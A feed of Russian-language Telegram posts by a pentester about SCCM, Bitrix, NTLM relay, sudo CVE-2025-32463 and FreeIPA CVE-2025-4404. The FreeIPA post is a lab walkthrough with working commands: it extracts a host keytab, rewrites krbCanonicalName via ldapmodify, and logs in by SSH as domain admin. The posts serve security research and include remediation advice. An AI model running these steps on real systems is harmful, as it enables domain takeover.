[SCCM NTLM Relay]
Всем привет!👋
Недавно была опубликована моя статья про атаки на SCCM. В ней достаточно подробно описан стенд для тестирования, сами атаки и конечно защита от них! Кейс через SCCM достаточно часто встречается в больших инфраструктурах, поэтому рекомендую ознакомиться!
Из интересного:
💬 Компрометация SCCM через TAKEOVER1
💬 Компрометация SCCM через TAKEOVER2
💬 Компрометация SCCM через TAKEOVER5
💬 Повышение привилегий в домене AD через SCCM
💬 Гайд по настройке защиты SCCM
Читать здесь.
Если будут вопросы, пишите в комментариях❔
@GigaHack
#pentest #gigahack #sccm #AD
Всем привет!
Недавно была опубликована моя статья про атаки на SCCM. В ней достаточно подробно описан стенд для тестирования, сами атаки и конечно защита от них! Кейс через SCCM достаточно часто встречается в больших инфраструктурах, поэтому рекомендую ознакомиться!
Из интересного:
Читать здесь.
Если будут вопросы, пишите в комментариях
@GigaHack
#pentest #gigahack #sccm #AD
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍11❤5🦄1
[PT Dephaze]
Всем привет!👋
Относительно недавно присоединился к команде продукта для автоматического пентеста PT Dephaze. В роли эксперта добавляю в продукт различные пентестерские техники, инструменты и подходы.😈
В этот четверг 27.02 состоится запуск продукта. В прямом эфире выполним старт тестирования, а я прокомментирую все происходящее с точки зрения пентестера. Трансляция обещает быть захватывающей - с компрометацией доменов AD и различных других сервисов. Хотите увидеть как PT Dephaze захватит инфраструктуру?
Присоединяйтесь к трансляции, будем рады всем!😈
@GigaHack
#dephaze #pentest #BAS #APT
Всем привет!
Относительно недавно присоединился к команде продукта для автоматического пентеста PT Dephaze. В роли эксперта добавляю в продукт различные пентестерские техники, инструменты и подходы.
В этот четверг 27.02 состоится запуск продукта. В прямом эфире выполним старт тестирования, а я прокомментирую все происходящее с точки зрения пентестера. Трансляция обещает быть захватывающей - с компрометацией доменов AD и различных других сервисов. Хотите увидеть как PT Dephaze захватит инфраструктуру?
Присоединяйтесь к трансляции, будем рады всем!
@GigaHack
#dephaze #pentest #BAS #APT
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🔥14❤6🌭2🦄1
[ Bitrix ultimate pentest guide ]
Всем привет!👋
Совсем недавно у меня вновь возник интерес к CMS Bitrix, так как стало известно о нескольких новых случаях взломов данной CMS-ки (тут и тут).
Автор канала @PentestNotes как раз агрегировал имеющуюся информацию по эксплуатации битрикса и написал замечательный обновленный мануал.🚨
P/S В нем присутствуют и мои заметки, которые публиковал в канале какое-то время назад
Автору респект и большое спасибо за работу🔥
#bitrix #pentest
Всем привет!
Совсем недавно у меня вновь возник интерес к CMS Bitrix, так как стало известно о нескольких новых случаях взломов данной CMS-ки (тут и тут).
Автор канала @PentestNotes как раз агрегировал имеющуюся информацию по эксплуатации битрикса и написал замечательный обновленный мануал.
P/S В нем присутствуют и мои заметки, которые публиковал в канале какое-то время назад
Автору респект и большое спасибо за работу
#bitrix #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍8❤3🦄1
This media is not supported in your browser
VIEW IN TELEGRAM
[RemoteMonologue]
Всем привет!👋
Вчера было опубликовано интересное исследование. В нем описан способ удаленного получения NetNTLMv1-хэша пользователя, работающего в интерактивной сессии. Настройки машины при этом могут быть корректными, в ходе атаки происходит их изменение.
Почему обращаем на это внимание? Хэш NetNTLMv1 хорош тем, что его можно без особого труда переслать на LDAP и провести манипуляции с доменом от имени пользователя, чья сессия была на удаленном узле.
💻 Ссылка на PoC
На мой взгляд самый реальный и просто кейс, который из этого вытекает: повышение привилегий в домене AD, когда у атакующего есть сессия локального администратора на узле и рядом с ней сессия администратора домена. Просто удаленно тригерим аутентификацию, делаем NTLM Relay на LDAP, создаем пользователя или повышаем привилегии существующей УЗ, получаем администратора домена.
Прикладываю небольшое демо для демонстрации кейса с повышением привилегий в домене. 👆
Судя по тексту исследования, пока что это фича, которую не запатчили и не планируют.
@GigaHack
#pentest #ad #gigahack
Всем привет!
Вчера было опубликовано интересное исследование. В нем описан способ удаленного получения NetNTLMv1-хэша пользователя, работающего в интерактивной сессии. Настройки машины при этом могут быть корректными, в ходе атаки происходит их изменение.
Почему обращаем на это внимание? Хэш NetNTLMv1 хорош тем, что его можно без особого труда переслать на LDAP и провести манипуляции с доменом от имени пользователя, чья сессия была на удаленном узле.
На мой взгляд самый реальный и просто кейс, который из этого вытекает: повышение привилегий в домене AD, когда у атакующего есть сессия локального администратора на узле и рядом с ней сессия администратора домена. Просто удаленно тригерим аутентификацию, делаем NTLM Relay на LDAP, создаем пользователя или повышаем привилегии существующей УЗ, получаем администратора домена.
Прикладываю небольшое демо для демонстрации кейса с повышением привилегий в домене. 👆
Судя по тексту исследования, пока что это фича, которую не запатчили и не планируют.
@GigaHack
#pentest #ad #gigahack
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🔥6❤4🆒2🦄1
[LPE Linux CVE-2025-32463]
Всем привет!👋
На днях вышла информация об уязвимости CVE-2025-32463. Баг позволяет в результате манипуляции опцией🚨
Нам удалось подтвердить PoC в нескольких версиях
1️⃣ На первом рисунке можете увидеть, что версия
2️⃣ Аналогично на втором рисунке версия
3️⃣ А вот на третьем рисунке видно, что версия
Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до
Подробнее о ресерче и приложенном PoC-е можно почитать здесь
#linux #pentest #LPE
Всем привет!
На днях вышла информация об уязвимости CVE-2025-32463. Баг позволяет в результате манипуляции опцией
sudo -R (--chroot) повысить привилегии до root. Нам удалось подтвердить PoC в нескольких версиях
sudo. 1.9.14p2 подвержена уязвимости. Сначала от непривилегированного пользователя не могли смотреть каталог /root, а после эксплуатации спокойно смогли перечислить содержимое;sudo 1.9.15p2 также подвержена уязвимости;sudo 1.9.13p3 не подвержена недостатку, так как до версии 1.9.14 необходимой функциональности не было.Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до
1.9.17.p1Подробнее о ресерче и приложенном PoC-е можно почитать здесь
#linux #pentest #LPE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17👍5❤3🦄1
[FreeIPA CVE-2025-4404]
Всем привет!👋
Пока все внимательно смотрят за новыми CVE и векторами в AD инфраструктуре как-то мимо проходят интересные штуки под FreeIPA инфру. Недавно вышла CVE на повышение привилегий от хоста до админа домена. Также подробности описаны в релизе.
Мы с @Zzyybbzzyabb смогли воспроизвести ее на стенде. Этому как раз и будет посвящен пост.
Начальные условия:
🟡 Домен FreeIPA
🟡 root доступ на одном из узлов домена. (Кстати очень удачно вышло LPE, о котором писали в предыдущем посте)
🔴 Акцентирую внимание, что даже не нужен доступ к УЗ в домене. (root доступ на узле не то же самое, что УЗ в домене)
🔘 Этап 1. Достаем секреты с машины - keytab для запроса TGT
Обычно он лежит по пути
Чтобы убедиться, что keytab принадлежит машине можно сделать
Там должно быть что-то типа такого
🔘 Этап 2. Получение TGT
Копируем полученный keytab себе на машину по тому же пути
🔘 Этап 3. Подмена krbCanonicalName в LDAP
Вся соль начинается здесь:
⚫️ У машинной УЗ есть право менять krbCanonicalName. Но проблема даже не в этом.
⚫️ Когда атрибут изменяется - никто не проверяет, существует ли уже объект с таким именем в LDAP. Поэтому машина может сделать себе krbCanonicalName = [email protected].
⚫️ При запросе TGT, если атрибут krbCanonicalName у принципала существует, то билет будет выдан на его имя. (В идеальном мире он совпадает с krbPrincipalName)
Для внесения изменения в объект LDAP создадим LDIF-файл со следующим содержимым:
Применяем:
🔘 Этап 4. Получение TGT уже с именем [email protected]
Видим что-то типа:
🔘 Этап 5. Доступ по SSH на DC как admin через Kerberos
В результате получаем полноценный доступ от администратора в домене.
Рекомендации:
🟣 Установить обновления безопасности CVE-2025-4404
🟣 Подробности в официальных источниках
Все манипуляции были проведены на стенде FreeIPA версии 4.6.8
@GigaHack
#pentest #freeipa #infra #cve
Всем привет!
Пока все внимательно смотрят за новыми CVE и векторами в AD инфраструктуре как-то мимо проходят интересные штуки под FreeIPA инфру. Недавно вышла CVE на повышение привилегий от хоста до админа домена. Также подробности описаны в релизе.
Мы с @Zzyybbzzyabb смогли воспроизвести ее на стенде. Этому как раз и будет посвящен пост.
Начальные условия:
Обычно он лежит по пути
/etc/krb5.keytabЧтобы убедиться, что keytab принадлежит машине можно сделать
klist -k /etc/krb5.keytab
Там должно быть что-то типа такого
host/[email protected]Копируем полученный keytab себе на машину по тому же пути
/etc/krb5.keytab и потом выполняем команды:kinit -k host/client.test.local
klist
Вся соль начинается здесь:
Для внесения изменения в объект LDAP создадим LDIF-файл со следующим содержимым:
dn: fqdn=client.test.local,cn=computers,cn=accounts,dc=test,dc=local
changetype: modify
replace: krbCanonicalName
krbCanonicalName: [email protected]
Применяем:
ldapmodify -Y GSSAPI -H ldap://ipa.test.local -f change_canonical.ldif
kinit -k host/client.test.local
klist
Видим что-то типа:
Default principal: [email protected]
ssh [email protected]
whoami
В результате получаем полноценный доступ от администратора в домене.
Рекомендации:
Все манипуляции были проведены на стенде FreeIPA версии 4.6.8
@GigaHack
#pentest #freeipa #infra #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍8❤4🌭1🦄1